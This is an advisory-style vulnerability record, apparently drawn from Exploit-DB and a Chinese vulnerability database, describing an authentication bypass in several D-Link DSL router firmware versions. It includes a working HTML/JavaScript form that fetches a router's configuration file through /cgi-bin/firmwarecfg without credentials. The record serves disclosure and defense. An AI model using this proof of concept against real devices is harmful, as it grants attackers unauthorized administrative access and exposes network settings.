https://www.exploit-db.com/exploits/25684
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1215

D-LinkDSL路由器是家庭和小型办公室常用的路由器。D-LinkDSL路由器对用户访问的认证存在问题，远程攻击者可能利用此漏洞非授权访问设备。在执行CGI/cgi-bin/firmwarecfg时，脚本会检查在/var/tmp/中是否存在fw_ip文件。如果存在这个文件的话，就会允许其中列出的所有IP地址无需认证直接访问设备。如果不存在这个文件的话，CGI就会创建一个新文件，在其中写入请求地址。

source: http://www.securityfocus.com/bid/13679/info

Various D-Link DSL routers are susceptible to a remote authentication bypass vulnerability. This issue is due to a failure of the devices to require authentication in certain circumstances.

This vulnerability allows remote attackers to gain complete administrative access to affected devices.

Various D-Link devices with the following firmware revisions are affected by this issue:
- V1.00B01T16.EN.20040211
- V1.00B01T16.EU.20040217
- V0.00B01T04.UK.20040220
- V1.00B01T16.EN.20040226
- V1.00B02T02.EU.20040610
- V1.00B02T02.UK.20040618
- V1.00B02T02.EU.20040729
- V1.00B02T02.DE.20040813
- V1.00B02T02.RU.20041014

Due to the common practice of code reuse, other devices are also likely affected by this issue. 

<html><head>Download config.xml:<title>GetConfig - Config file
download</title></head><body>

<script lang="javascript">
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-bin/firmwarecfg';
document.DownloadConfig.submit();
}
</script>

<form name="InputBox">
<br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
<input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"><br>
</form></body></html>

来源:BUGTRAQ
名称:20050526DSL-504T(andmaybemanyother)remoteaccesswithoutpasswordbug
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111722515805478&w;=2
来源:BID
名称:13679
链接:http://www.securityfocus.com/bid/13679
来源:SECUNIA
名称:15422
链接:http://secunia.com/advisories/15422